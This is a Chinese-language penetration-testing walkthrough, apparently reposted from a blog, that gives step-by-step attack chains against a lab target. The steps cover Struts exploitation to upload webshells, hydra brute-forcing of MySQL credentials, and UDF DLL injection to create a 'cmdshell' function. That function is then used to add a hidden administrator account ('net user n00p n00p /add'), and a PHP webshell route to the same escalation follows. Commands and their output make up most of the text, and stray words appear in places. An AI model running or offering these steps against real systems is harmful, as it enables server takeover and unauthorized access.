0428

時間  2019-11-17
原文   原文鏈接

0x01 struts getshell

1.1 尋找帶 .action 的URL

1.2 在url中設法出現url

1.3 把URL進工具,點第三個漏洞,獲取信息

1.4 執行命令

1.5 將測試test.txt 小馬one.8.jsp cmd馬k8cmd.jsp 大馬css.jsp 依次上傳

1.6 結果,發現test.txt one8.jsp k8cmd.jsp成功上傳 css.jsp不成功,尋找另外的方法

1.7 鏈接小馬,將菜刀馬代碼放入內容框,點 上傳代碼 按鈕

1.8 驗證文件成功上傳

1.9 上菜刀

0x02 利用容許遠程鏈接的mysql提權

2.1 在victim新建n00p用戶,並授予遠程鏈接權限

CREATE USER 'n00p'@'localhost' IDENTIFIED BY 'n00p';
GRANT ALL PRIVILEGES ON *.* TO 'n00p'@'%' IDENTIFIED BY 'n00p' WITH GRANT OPTION;
 FLUSH PRIVILEGES;

2.2 在kali自制字典

root@kali:~/dock# cat user.txt
root
n00p
root@kali:~/dock# cat pass.txt
root
n00p

2.3 利用hydra爆破成功

··· bash
root@kali:~/dock# hydra vic mysql -L user.txt -P pass.txt -V
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.php

Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-27 23:23:55
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try per task
[DATA] attacking mysql://vic:3306/
[ATTEMPT] target vic - login "root" - pass "root" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target vic - login "root" - pass "n00p" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target vic - login "n00p" - pass "root" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target vic - login "n00p" - pass "n00p" - 4 of 4 [child 3] (0/0)
[3306][mysql] host: vic login: n00p password: n00p
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-27 23:23:55
```css

2.4 利用mysql客戶端進行鏈接,這裏用的是navicat

2.5 右鍵此鏈接,console,輸入 set @my_udf_a=concat('',dll的16進制);

mysql> use mysql;
Database changed
mysql> set @my_udf_a=concat('', 此處限於篇幅省略);
Query OK, 0 rows affected (0.00 sec)

2.6 建表my_udf_data,字段爲data,類型爲longblob

mysql> create table my_udf_data(data LONGBLOB);
Query OK, 0 rows affected (0.08 sec)

2.7 將my_udf_data表更新爲@my_udf_a中的數據

mysql> insert into my_udf_data values("");
Query OK, 1 row affected (0.00 sec)

### 2.8 mysql> update my_udf_data set data = @my_udf_a;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

2.9 查看dll導出路徑

Mysql<5.0,導出路徑隨意;

5.0<=mysql<5.1,則須要導出至目標服務器的系統目錄(如:system32),不然在下一步操做中你會看到「No paths allowed for shared library」錯誤;

mysql>5.1,須要導出dll到插件路徑,插件路徑能夠用下面這條命令查看:show variables like '%plugin%';
mysql> select @@version;
+-----------+
| @@version |
+-----------+
| 5.5.53    |
+-----------+
1 row in set (0.01 sec)
mysql> show variables like '%plugin%';
+---------------+-------------------------------------------+
| Variable_name | Value                                     |
+---------------+-------------------------------------------+
| plugin_dir    | C:\phpStudy\PHPTutorial\MySQL\lib\plugin\ |
+---------------+-------------------------------------------+
1 row in set (0.01 sec)

2.10 將dll導出

這一步遇到了plugin文件夾不存在的問題,由於是測試用,因此 手動從目標機器創建plugin文件夾html

mysql> select data from my_udf_data into DUMPFILE 'C:\phpStudy\PHPTutorial\MySQL\lib\plugin\n00p.dll';
1 - Can't create/write to file 'C:phpStudyPHPTutorialMySQLlibplugin
00p.dll' (Errcode: 22)
mysql> select data from my_udf_data into DUMPFILE 'C:/phpStudy/PHPTutorial/MySQL/lib/plugin/n00p.dll';
Query OK, 1 row affected (0.00 sec)

由以上代碼塊可知,路徑中單反斜槓不起做用,需轉換成單正斜槓,或者雙反斜槓mysql

2.11 建立cmdshell function

mysql> create function cmdshell returns string soname 'n00p.dll';
Query OK, 0 rows affected (0.08 sec)

2.12 經過cmdshell function進行提權

這裏不知爲什麼亂碼,但能夠肯定命令被執行,等會能夠驗證是否執行成功sql

mysql> select cmdshell('net user n00p n00p /add');
+----------------------------------------------------------+
| cmdshell('net user n00p n00p /add')                      |
+----------------------------------------------------------+
| ����ɹ���ɡ�


--------------------------------------------���!
 |
+----------------------------------------------------------+
1 row in set (0.41 sec)

mysql> select cmdshell('net localgroup administrators n00p /add');
+----------------------------------------------------------+
| cmdshell('net localgroup administrators n00p /add')      |
+----------------------------------------------------------+
| ����ɹ���ɡ�


--------------------------------------------���!
 |
+----------------------------------------------------------+
1 row in set (0.05 sec)

2.13 發現目標機器開啓了3389端口,登陸驗證,成功!



0x03 利用大馬dama.php加udf.php提權不容許遠程鏈接的mysql

3.1 改變測試環境:

目標機切換Apache爲服務方式運行,並添加低權限用戶,爲該用戶添加日誌文件讀寫權限
shell

3.2 假設此站有文件上傳漏洞,則上傳一個大馬,並用大立刻傳udf.php

3.3 url訪問udf.php,填入mysql鏈接信息

3.4 利用大馬查看plugin目錄

3.5 訪問udf.php,將目錄信息填入,同時點擊處處到此目錄:

此處用的雙反斜槓,同時改變html元素的width屬性,使得輸入框能顯示完整路徑bash

3.6 使用SQL語句建立功能函數:

3.7 如今能夠在SQL命令輸入框內執行功能函數了,如下操做同0x02後半部分,再也不贅述。

每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程